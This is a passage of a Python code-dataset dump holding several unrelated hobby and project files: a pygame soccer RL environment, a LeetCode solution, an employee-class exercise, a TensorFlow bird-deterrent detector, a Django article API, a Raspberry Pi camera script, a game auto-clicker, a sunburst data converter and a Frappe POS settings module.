self.display)\r\n\r\n if self.display:\r\n pygame.display.update()\r\n self.clock.tick(60)\r\n\r\n # done if a goal was scored\r\n if self.p1.goals != 0 and self.p2.goals != 0:\r\n done = True\r\n if self.p1.goals != 0:\r\n p1_rew += 30000\r\n p2_rew += -10000\r\n else:\r\n p1_rew += -10000\r\n p2_rew += 30000\r\n\r\n # reward for gaining possession\r\n if self.p1.possession and not p1_possession_initial:\r\n p1_rew += 10\r\n p2_rew += -10\r\n elif self.p1.possession:\r\n p1_rew += 3\r\n p2_rew += -1\r\n\r\n if self.p2.possession and not p2_possession_initial:\r\n p2_rew += 10\r\n p1_rew += -10\r\n elif self.p2.possession:\r\n p2_rew += 3\r\n p1_rew += -1\r\n\r\n next_state = torch.tensor([self.p1.x, self.p1.y, self.p1.dx, self.p1.dy, int(self.p1.possession), self.p2.x, self.p2.y, self.p2.dx, self.p2.dy, int(self.p2.possession), self.ball.x, self.ball.y, self.ball.dx, self.ball.dy])\r\n\r\n if done:\r\n next_state = None\r\n \r\n return (next_state, torch.tensor(p1_rew), torch.tensor(p2_rew), done)\r\n \r\n def reset(self, display=False):\r\n self.clock = pygame.time.Clock()\r\n self.display=display\r\n self.ball = Ball()\r\n self.p1 = Player(1)\r\n self.p2 = Player(2)\r\n self.field = Field()\r\n\r\n return torch.tensor([self.p1.x, self.p1.y, self.p1.dx, self.p1.dy, int(self.p1.possession), self.p2.x, self.p2.y, self.p2.dx, self.p2.dy, int(self.p2.possession), self.ball.x, self.ball.y, self.ball.dx, self.ball.dy]) # initial state vector\r\n\r\ndef inBetween(x, y, z):\r\n # returns true if the number x is in between y and z\r\n if x >= y and x <= z:\r\n return True\r\n else:\r\n return False\r\n\r\ndef displayScores(player1, player2, gameDisplay, display=False):\r\n if display:\r\n display_width = 400\r\n player1_str = \"P1: \" + str(player1.goals)\r\n player2_str = \"P2: \" + str(player2.goals)\r\n\r\n red = (255, 0, 0)\r\n black = (0, 0, 0)\r\n\r\n font = pygame.font.SysFont(None, 25)\r\n\r\n player1_txt = font.render(player1_str, True, red)\r\n player2_txt = font.render(player2_str, True, black)\r\n\r\n gameDisplay.blit(player1_txt, (0, 0))\r\n gameDisplay.blit(player2_txt, (display_width - player2_txt.get_width(), 0))\r\n\r\n\r\nif __name__ == '__main__':\r\n done = False\r\n game = SoccerGame()\r\n s_0 = game.reset(display=False)\r\n while not done:\r\n action_1 = random.randrange(0, 5)\r\n action_2 = random.randrange(0, 5)\r\n s_1, p1_r, p2_r, done = game.step(action_1, action_2)\r\n if p1_r != 0:\r\n print(\"P1 Reward: {}, Action: {}\".format(p1_r, action_1))\r\n if p2_r != 0:\r\n print(\"P2 Reward: {}, Action: {}\".format(p2_r, action_2))\r\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"134985921","text":"class Solution(object):\n def longestWord(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: str\n \"\"\"\n seen = set()\n seen.add('')\n res = ''\n words.sort(key=len)\n for word in words:\n if word[:-1] in seen:\n seen.add(word)\n if len(word) > len(res):\n res = word\n elif len(word) == len(res):\n res = min(word, res)\n return res","sub_path":"leetcode/python/ex_720.py","file_name":"ex_720.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"73950217","text":"'''\nModule Docstring\n'''\n\n\nclass Employee():\n '''\n Create a Employee Class\n '''\n # Define the details for the Employee class\n def __init__(self, name, dob, emp_id):\n self.name = name\n self.dob = dob\n self.emp_id = emp_id\n self.email = self.emp_id + \"@testcompany.com\"\n\n# Add a __str__ method to give a Human readable desciption of the class.\n\n def __str__(self):\n return \"This is the Employee Class __str__\"\n\n# Add a __repr__ method to return the Class used to create the object.\n\n def __repr__(self):\n return \"Employee(self, name,dob,emp_id)\"\n\n# Method to \n\n# Method to display the Employee's information\n\n def display(self):\n '''\n Function Docstring\n '''\n print('\\n') # Inserts new line.\n print(\"The Employee's name is: \" + self.name)\n print(\"The Employee's date of Birth is \" + self.dob)\n print(\"The Employee's ID is \" + self.emp_id)\n print(\"The Employee's Email Address is \" + self.email)\n print(\"The Employee's Contract Type is: \" + self.__class__.__name__)\n print(\"\\n\")\n\n\nclass Temporary(Employee):\n\n '''\n Create a Sub Class of Employee for Temporary Employees\n '''\n\n # Class variable to allow tracking of number of Employees\n no_of_temp_emp = 0\n\n def __init__(self, name, dob, emp_id):\n super().__init__(name, dob, emp_id) # Inherited from Employee Class\n self.hourlyrate = None # Specific to Temporary Class\n self.weeklyhours = None # Specific to Temporary Class\n self.tgp = None # Temporary Gross Weekly Pay\n # Add to running total of Temporary Employees\n Temporary.no_of_temp_emp = Temporary.no_of_temp_emp + 1\n\n # Add a __str__ method to give a Human readable desciption of the class.\n\n def __str__(self):\n return \"This is the Temporary Employee Class __str__method\"\n\n # Add a __repr__ method to return the Class used to create the object\n\n def __repr__(self):\n return \"Temporary(self, name,dob,emp_id)\"\n\n # Method to calculate the gross weekly wage of the Employee\n\n def salary_info(self):\n '''\n Function Docstring\n '''\n self.tgp = (self.hourlyrate * self.weeklyhours)\n print('\\n')\n print(f'Employee hourly rate: £{self.hourlyrate}')\n print(f'Employee contracted weekly hours:{self.weeklyhours} hours')\n print(f'Employee gross weekly salary: £{self.tgp}')\n\n\nclass Permanent(Employee):\n '''\n Create a Sub Class of Employee for Permanent Employees\n '''\n # Class variable to allow tracking of number of Employees\n no_of_perm_emp = 0\n\n def __init__(self, name, dob, emp_id, ):\n super().__init__(name, dob, emp_id) # Inherited from Employee Class\n self.annualsalary = None # Specific to Permanent Class\n self.pensionplan = None # Sepcific to Permanent Class\n self.pgp = None # Permanent Gross Weekly Pay\n # Increment the number of permanent employees by 1\n Permanent.no_of_perm_emp = Permanent.no_of_perm_emp + 1\n\n# Add a __str__ method to give a Human readable desciption of the class.\n\n def __str__(self):\n return \"This is the Permanent Employee Class __str__ method\"\n\n# Add a __repr__ method to return the Class used to create the object\n\n def __repr__(self):\n return \"Permanent(self, name,dob,emp_id)\"\n\n# Add a method to calculate the Permanent Gross Weekly salary\n def salary_info(self):\n '''\n Function Docstring\n '''\n self.pgp = (self.annualsalary / 52)\n print('\\n')\n print(f'Employee Annual Salary: £{self.annualsalary}')\n print(f'Employee Pension Scheme Status: {self.pensionplan}')\n print(f'Employee gross weekly salary: £{self.pgp}')\n\n\n# Create an Employee\n\njohn = Temporary('John Wall', '19/06/1975', 'E0001')\njohn.hourlyrate = float(5.55)\njohn.weeklyhours = float(37.5)\n\nstuart = Permanent('Stuart Riding', '06/06/1975', 'E0002')\nstuart.annualsalary = 36000\nstuart.pensionplan = \"Member\"\n\n# Program to access the data\n\nACTIVE = True\n\nwhile ACTIVE is True:\n print(\"\\n\")\n print(\"Please choose from the following options: \")\n print(\"\\n\")\n print(\"1. Class Details\")\n print(\"2. Employee Numbers\")\n print(\"3. Employee Details\")\n print(\"\\n\")\n command = input(\"> \")\n # Check the command entered\n if command == \"1\":\n # Print the Class Details.\n # Display the output of the __str__ methods for each sub-class\n print(stuart)\n print(john)\n elif command == \"2\":\n # Print the Employee Numbers\n all_emp = int(Temporary.no_of_temp_emp) + int(Permanent.no_of_perm_emp)\n print(f\"Total No. of Temporary Employees:{Temporary.no_of_temp_emp}\")\n print(f\"Total No. of Permanent Employees:{Permanent.no_of_perm_emp}\")\n print(f\"Total No. of Employees: {all_emp}\")\n elif command == \"3\":\n # Enter a second loop to access Employee Details\n print(\"\\n\")\n print(\"Select your Employee:\")\n # Select which Employee details you wish to see\n print(\"1. John Wall\")\n print(\"2. Stuart Riding\")\n selection = input(\"> \")\n if selection == \"1\":\n john.display()\n # Display the Employee's Personal Data. Method from Parent Class\n john.salary_info()\n # Display the Employee's Salary data. Method from Sub Class\n elif selection == \"2\":\n stuart.display()\n # Display the Employee's Personal Data. Method from Parent Class\n stuart.salary_info()\n # Display the Employee's Salary data. Method from Sub Class\n else:\n print(\"Invalid ID. Please try again.\")\n # Invalid Employee entered. Start Again\n else:\n ACTIVE = False\n # Press any other button, and the programme ends\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"533195078","text":"# coding: utf-8\n\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport pygame\nimport time\nimport datetime\nimport random\nimport urllib.request\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\n\nimport cv2\n#cap = cv2.VideoCapture('http://192.168.43.161:29444/videostream.cgi?user=admin&pwd=88888888')\ncap = cv2.VideoCapture(0)\n#cap = cv2.VideoCapture(0)\n'''if tf.__version__ < '1.4.0':\n raise ImportError('Please upgrade your tensorflow installation to v1.4.* or later!')\n'''\nsys.path.append(\"..\")\n\n# ## Object detection imports\n# Here are the imports from the object detection module.\n\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\n\n\n# Model preparation\n# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_CKPT` to point to a new .pb file. \n# By default we use an \"SSD with Mobilenet\" model here. See the [detection model zoo](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md) for a list of other models that can be run out-of-the-box with varying speeds and accuracies.\n\n# What model to download.\nMODEL_NAME = 'hyericustom_77996'\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('data', 'object-detection.pbtxt')\n\nNUM_CLASSES = 7\n\n\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\n# Loading label map\n# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine\npygame.mixer.init()\nbang=pygame.mixer.Sound(\"police_s.wav\")\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\nglobal capcount\ncapcount = 0\nglobal play\nplay = 0\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n while True:\n ret,image_np=cap.read()\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n \n \n final_score = np.squeeze(scores) \n count = 0\n unharmfulcount = 0\n for i in range(100):\n if scores is None or final_score[i] > 0.3:\n count = count + 1 \n \n # wwwwwwwwwww print name and score !!!!!!!!!!!!!!!\n objects = [] \n global harmful\n \n harmful = 1\n unharmfulcount = 0\n harmfulcountbird=0\n harmfulcountship=0\n \n for index,value in enumerate(classes[0]):\n now = datetime.datetime.now().strftime(\"%y_%m_%d_%H-%M-%S\")\n if scores[0,index] > 0.3:\n print(category_index.get(value))\n if category_index.get(value).get('name')=='person' or category_index.get(value).get('name')=='pigeon' or category_index.get(value).get('name')=='eurasicanTreeSparrow':\n unharmfulcount = unharmfulcount + 1\n harmful = 1\n elif category_index.get(value).get('name')=='baikalTeal' or category_index.get(value).get('name')=='greyHeron' or category_index.get(value).get('name')=='cormorant' or category_index.get(value).get('name')=='cormorant':\n harmfulcountbird = harmfulcountbird + 1\n harmful = 0\n start = time.time()\n transstart = time.gmtime(start)\n print(transstart)\n elif category_index.get(value).get('name')=='fishBoat':\n harmfulcountship = harmfulcountship + 1\n harmful = 0\n start = time.time()\n transstart = time.gmtime(start)\n print(transstart)\n harmfulcount = harmfulcountbird + harmfulcountship\n random_num = random.randrange(1,4)\n print(random_num) \n if (harmful==0 and unharmfulcount >= 1) or (harmful==0 and unharmfulcount==0): \n if play==1:\n print('siren is already being played')\n elapsed = start - end\n elapsed2 = start - end2\n if elapsed > 30:\n print('gg')\n cv2.imwrite(\"/var/www/html/imgs/\" + str(now) + \".jpg\", image_np)\n interval = time.time()\n end = interval\n if elapsed2 > 10:\n push ='1'\n url = \"http://localhost/fcm/push_notification.php?push=\"+push\n response = urllib.request.urlopen(url)\n data = response.read()\n print(data)\n interval2 = time.time()\n end2 = interval2\n pass\n elif play==0:\n if random_num==1 and harmfulcountbird >= 1:\n pygame.mixer.music.load('police_s.wav')\n pygame.mixer.music.play(-1)\n elif (random_num==1 or random_num==2 or random_num==3) and harmfulcountship >= 1:\n pygame.mixer.music.load('police_s.wav')\n pygame.mixer.music.play(-1)\n elif random_num==2 and harmfulcountbird >= 1:\n pygame.mixer.music.load('freq.wav')\n pygame.mixer.music.play(-1)\n elif random_num==3 and harmfulcountbird >= 1:\n pygame.mixer.music.load('hawksound.wav')\n pygame.mixer.music.play(-1) \n #bang.play()\n print('now siren is silent, so play the siren')\n if capcount ==0:\n print('capcount=%d'%capcount)\n cv2.imwrite(\"/var/www/html/imgs/\" + str(now) + \".jpg\", image_np)\n capcount = 1\n print('capcount=%d'%capcount)\n end = time.time()\n end2 = time.time()\n push='1'\n url = \"http://localhost/fcm/push_notification.php?push=\"+push\n response = urllib.request.urlopen(url)\n data = response.read()\n print(data)\n\t\n elif capcount ==1: \n elapsed = start - end\n elapsed2 = start - end2\n print(elapsed)\n if elapsed > 30: #every 30seconds, capture the image\n cv2.imwrite(\"/var/www/html/imgs/\" + str(now) + \".jpg\", image_np)\n interval = time.time()\n end = interval\n if elapsed2 > 10: #every 5minutes, send a android alarm\n push='1'\n url = \"http://localhost/fcm/push_notification.php?push=\"+push\n response = urllib.request.urlopen(url)\n data = response.read()\n print(data)\n\n interval2 = time.time()\n end2 = interval2\n play = 1\n print('alredy siren and speaker is turned on')\n elif harmful!=0 and harmfulcount==0: \n pygame.mixer.music.stop()\n print('it is not harmful, so didnt play the speaker and siren')\n play=0\n\n \n \n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=4)\n \n cv2.imshow('object detection',cv2.resize(image_np,(800,600)))\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break;\n \n","sub_path":"noGPIO2.py","file_name":"noGPIO2.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"375838349","text":"from Tadmin.models import Article\nfrom rest_framework import serializers,status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nclass ArticleSerializer(serializers.ModelSerializer):\n title = serializers.CharField(min_length=1)\n class Meta:\n model = Article\n fields = '__all__'\n\n@api_view(['GET','POST'])\ndef a_article_list(request):\n if request.method == 'GET':\n article_1 = Article.objects.order_by('-id') #order_by('-id')\n serializer =ArticleSerializer(article_1,many=True)\n return Response(serializer.data)\n elif request.method == 'POST':\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n body = {\n 'body': serializer.errors,\n 'msg': '40001'\n }\n return Response(body, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['PUT','DELETE','GET','POST'])\ndef a_article_info(request,id):\n article = Article.objects.get(id=id)\n if request.method == 'GET':\n # article_1 = Article.objects.order_by('-id') #order_by('-id')\n serializer = ArticleSerializer(article)\n return Response(serializer.data)\n if request.method == 'PUT':\n serializer = ArticleSerializer(article,data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n if request.method == 'POST':\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n body = {\n 'body': serializer.errors,\n 'msg': '40001'\n }\n return Response(body, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n article.delete()\n return Response({'msg': 'A-OK'}, status=status.HTTP_201_CREATED)\n","sub_path":"Tadmin/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"397147726","text":"from picamera import PiCamera\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\ncamera = PiCamera()\n\nGPIO.setup(2, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR\nGPIO.setup(3, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR 940\nGPIO.setup(4, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR 880\nGPIO.setup(17, GPIO.IN, pull_up_down = GPIO.PUD_UP) # Pin Push Button NoIR 785\nGPIO.setup(18, GPIO.OUT) # Pin LED\n\nA=0 \nB=0\nC=0\nD=0\n\nwhile True:\n button_stateN = GPIO.input(2) # Pin Push Button NoIR\n button_state9 = GPIO.input(3) # Pin Push Button NoIR 940\n button_state8 = GPIO.input(4) # Pin Push Button NoIR 880\n button_state7 = GPIO.input(17) # Pin Push Button NoIR 785\n \n if button_stateN == False: #NoIR\n GPIO.output(18, GPIO.HIGH)\n print('Button Pressed NoIR %s...' %A)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.1 NoIR %s.jpg' % A)\n A+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n if button_state9 == False: # NoIR 940\n GPIO.output(18, GPIO.HIGH) \n print('Button Pressed BN940 %s...' %B)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.2 NoIR BN940 %s.jpg' % B)\n B+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n if button_state8 == False: # NoIR 880\n GPIO.output(18, GPIO.HIGH)\n print('Button Pressed BN880 %s...' %C)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.3 NoIR BN880 %s.jpg' % C)\n C+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n if button_state7 == False: # NoIR 785\n GPIO.output(18, GPIO.HIGH)\n print('Button Pressed BN785 %s...' %D)\n time.sleep(2)\n camera.start_preview()\n# Take Picture\n GPIO.output(18, GPIO.LOW)\n time.sleep(4)\n camera.capture('/home/pi/Desktop/NoIR Result/1.4 NoIR BN785 %s.jpg' % D)\n D+=1\n GPIO.output(18, GPIO.HIGH)\n time.sleep(0.5)\n# Stop Picture\n camera.stop_preview()\n time.sleep(0.2)\n else:\n GPIO.output(18, GPIO.LOW)\n \n\n\n","sub_path":"PROGRAM Camera Tongsis/(Rev 1)PB NoIR 3 Band.py","file_name":"(Rev 1)PB NoIR 3 Band.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"415675423","text":"import cv2, glob, time, pyautogui, enum, numpy\n\nclass Template(enum.Enum):\n COIN=\"img/templates/coin*.png\"\n PLOT=\"img/templates/plot*.png\"\n SHOVEL=\"img/templates/shovel*.png\"\n HARVEST=\"img/templates/harvest_all*.png\"\n OK=\"img/templates/ok*.png\"\n CENTER=\"img/templates/center*.png\"\n POTATO=\"img/templates/potato*.png\"\n WHEAT=\"img/templates/wheat*.png\"\n CORN=\"img/templates/corn*.png\"\n\nTHRESHOLD = 0.6\nDELAY_PER_CLICK = 0.5\nCROP = Template.CORN\nPLOT_COUNT = 5\n\ndef click(p):\n x,y = p\n pyautogui.click(x, y)\n time.sleep(DELAY_PER_CLICK)\n\ndef collect_coins():\n coins = detect(Template.COIN)\n for coin in coins:\n click(coin)\n\ndef handle_message():\n message = detect(Template.OK)\n if message:\n click(message[0])\n\ndef plant_crops():\n plots = detect(Template.PLOT)\n if plots:\n click(plots[0])\n time.sleep(2)\n crop = detect(CROP)\n if crop:\n for i in range(PLOT_COUNT):\n click((crop[0][0] + 50, crop[0][1] + 120))\n\ndef go_to_center():\n center = detect(Template.CENTER)\n if center:\n click(center[0])\n\ndef harvest_crops():\n shovel = detect(Template.SHOVEL)\n if shovel:\n click((shovel[0][0], shovel[0][1] + 70))\n harvest = detect(Template.HARVEST)\n if harvest: \n click(harvest[0])\n\ndef detect(template):\n template_path = template.value\n large_image = pyautogui.screenshot()\n large_image = cv2.cvtColor(numpy.array(large_image), cv2.COLOR_RGB2BGR)\n\n # Get matched objects\n matches = []\n for file in glob.glob(template_path):\n small_image = cv2.imread(file)\n height, width = small_image.shape[:-1]\n\n result = cv2.matchTemplate(large_image, small_image, cv2.TM_CCOEFF_NORMED)\n\n locations = numpy.where(result >= THRESHOLD)\n\n matches += zip(*locations[::-1])\n\n # Combine overlapping matched objects\n results = []\n mask = numpy.zeros(large_image.shape[:-1], numpy.uint8)\n\n for match in matches:\n if mask[match[1] + height//2, match[0] + width//2] != 255:\n mask[match[1]:match[1] + height, match[0]:match[0] + width] = 255\n center = (match[0] + width//2, match[1] + height//2)\n results.append(center)\n print(f'Found {template.name.lower()} at {center}.')\n\n return results\n\nwhile(True):\n collect_coins()\n harvest_crops()\n plant_crops()\n go_to_center()\n handle_message()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"16281610","text":"# File: sunburst_csv_converter.py\n# Author: Eric Gronda\n# Date: 6/22/18\n# Description:\n# \t\tConverts nodes_classified.csv to json format for \n#\t\tcombatibility with sunburst diagram\n# References:\n#\t\tUser \"Hett\"'s comment on: \n#\t\thttps://stackoverflow.com/questions/43757965/convert-csv-to-json-tree-structure\n\n########################################################################################\n#\tWant to make a sunburst diagram that \n#\n#\tFINAL OUTPUT:\n#\n#\t\tnode -> { name, value, children }\n#\t\tchildren -> [ nodes ]\n\nimport sys\nimport csv\nfrom collections import defaultdict\n\n\ndef ctree():\n\t\"\"\" One of the python gems. Making possible to have dynamic tree structure.\n\n\t\"\"\"\n\treturn defaultdict(ctree)\n\n\ndef build_leaf(name, leaf):\n\t\"\"\" Recursive function to build desired custom tree structure\n\n\t\"\"\"\n\tres = {\"name\": name}\n\t# add children node if the leaf actually has any children\n\tif len(leaf.keys()) > 0:\n\t\tres[\"children\"] = [build_leaf(k, v) for k, v in leaf.items()]\n\t\n\t# set a size for the nodes\n\telse:\n\t\tres[\"size\"] = 1 # 1 person per node\n\t\n\n\treturn res\n\ndef readIn():\n\n\t# make an array of data to return\n\tdata = []\n\n\t# sequences by week (place weekNum between fileProto and fileProtoEnd)\n\tfileProto = \"../../../Raw_data_processing_JSON_to_CSV/sequence\"\n\tfileProtoEnd = \".txt\"\n\n\tweekNum = 0\t\n\tif(sys.argv[1]):\n\t\tweekNum = sys.argv[1]\n\telse:\n\t\tweekNum = -1\n\n\tfileName = fileProto + weekNum + fileProtoEnd\n\n\tif weekNum != -1:\n\t\n\t\t# open file\n\t\twith open(fileName) as ifp:\n\n\t\t\t#data.append( { str(weekNum) : [] } )\n\t\t\tweek = csv.reader(ifp)\n\t\t\n\t\t\tfor student in week:\n\t\t\t\n\t\t\t\t# split student sequences\n\t\t\t\tstudentSeq = student[0].split(' ')\n\t\t\t\tdata.append( studentSeq[ 1 : len(studentSeq) - 1] )\n\n\t\treturn data\n\n\telse:\n\t\treturn -1\n\n\ndef writeOut( data ):\n\t\"\"\" The main thread composed from two parts.\n\n\tFirst it's parsing the csv file and builds a tree hierarchy from it.\n\tSecond it's recursively iterating over the tree and building custom\n\tjson-like structure (via dict).\n\n\tAnd the last part is just printing the result.\n\n\t\"\"\"\n\ttree = ctree()\n\n\tfor rid, row in enumerate(data):\n\n\t\t# skipping first header row. remove this logic if your csv is\n\t\t# headerless\n\t\tif rid == 0:\n\t\t\tcontinue\n\n\t\t# usage of python magic to construct dynamic tree structure and\n\t\t# basically grouping csv values under their parents\n\t\tleaf = tree[row[0]]\n\t\tfor cid in range(1, len(row)):\n\t\t\tleaf = leaf[row[cid]]\n\n\t# building a custom tree structure\n\tres = []\n\tfor name, leaf in tree.items():\n\t\tres.append(build_leaf(name, leaf))\n\n\t\n\t# adding root node\n\tres = { \"name\":\"root\" , \"children\":res }\n\n\n\t# outputs to json file\n\t# makes student sequence file\n\timport json\n\t\t\n\tfileName = \"student_seq_week/student_seq_week_\" + str(sys.argv[1]) + \".json\"\n\n\twith open(fileName, 'w') as outfile:\n\t\tjson.dump(res, outfile)\n\n\t\n\ndef main( ):\n\n\t# error prevention\n\tif(not sys.argv[1]):\n\t\tprint(\"Please enter a file tag as second argument\")\n\t\treturn 0\n\n\t# Read in and write out the data from a csv\n\twriteOut( readIn() )\n\n\t\n# so let's roll\nmain()\n","sub_path":"d3js_projects/sunburst/csv_converter_sunburst/sunburst_data_converter_student.py","file_name":"sunburst_data_converter_student.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"56684442","text":"# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import msgprint, _\nfrom frappe.utils import cint\n\nfrom frappe.model.document import Document\n\nclass POSSetting(Document):\n\tdef validate(self):\n\t\tself.check_for_duplicate()\n\t\tself.validate_expense_account()\n\t\tself.validate_all_link_fields()\n\n\tdef check_for_duplicate(self):\n\t\tres = frappe.db.sql(\"\"\"select name, user from `tabPOS Setting`\n\t\t\twhere ifnull(user, '') = %s and name != %s and company = %s\"\"\",\n\t\t\t(self.user, self.name, self.company))\n\t\tif res:\n\t\t\tif res[0][1]:\n\t\t\t\tmsgprint(_(\"POS Setting {0} already created for user: {1} and company {2}\").format(res[0][0],\n\t\t\t\t\tres[0][1], self.company), raise_exception=1)\n\t\t\telse:\n\t\t\t\tmsgprint(_(\"Global POS Setting {0} already created for company {1}\").format(res[0][0],\n\t\t\t\t\tself.company), raise_exception=1)\n\n\tdef validate_expense_account(self):\n\t\tif cint(frappe.defaults.get_global_default(\"auto_accounting_for_stock\")) \\\n\t\t\t\tand not self.expense_account:\n\t\t\tmsgprint(_(\"Expense Account is mandatory\"), raise_exception=1)\n\n\tdef validate_all_link_fields(self):\n\t\taccounts = {\"Account\": [self.cash_bank_account, self.income_account,\n\t\t\tself.expense_account], \"Cost Center\": [self.cost_center],\n\t\t\t\"Warehouse\": [self.warehouse]}\n\n\t\tfor link_dt, dn_list in accounts.items():\n\t\t\tfor link_dn in dn_list:\n\t\t\t\tif link_dn and not frappe.db.exists({\"doctype\": link_dt,\n\t\t\t\t\t\t\"company\": self.company, \"name\": link_dn}):\n\t\t\t\t\tfrappe.throw(_(\"{0} does not belong to Company {1}\").format(link_dn, self.company))\n\n\tdef on_update(self):\n\t\tself.set_defaults()\n\n\tdef on_trash(self):\n\t\tself.set_defaults(include_current_pos=False)\n\n\tdef set_defaults(self, include_current_pos=True):\n\t\tfrappe.defaults.clear_default(\"is_pos\")\n\n\t\tif not include_current_pos:\n\t\t\tcondition = \" where name != '%s'\" % self.name.replace(\"'\", \"\\'\")\n\t\telse:\n\t\t\tcondition = \"\"\n\n\t\tpos_view_users = frappe.db.sql_list(\"\"\"select user\n\t\t\tfrom `tabPOS Setting` {0}\"\"\".format(condition))\n\n\t\tfor user in pos_view_users:\n\t\t\tif user:\n\t\t\t\tfrappe.defaults.set_user_default(\"is_pos\", 1, user)\n\t\t\telse:\n\t\t\t\tfrappe.defaults.set_global_default(\"is_pos\", 1)\n\n@frappe.whitelist()\ndef get_series():\n\treturn frappe.get_meta(\"Sales Invoice\").get_field(\"naming_series\").options or 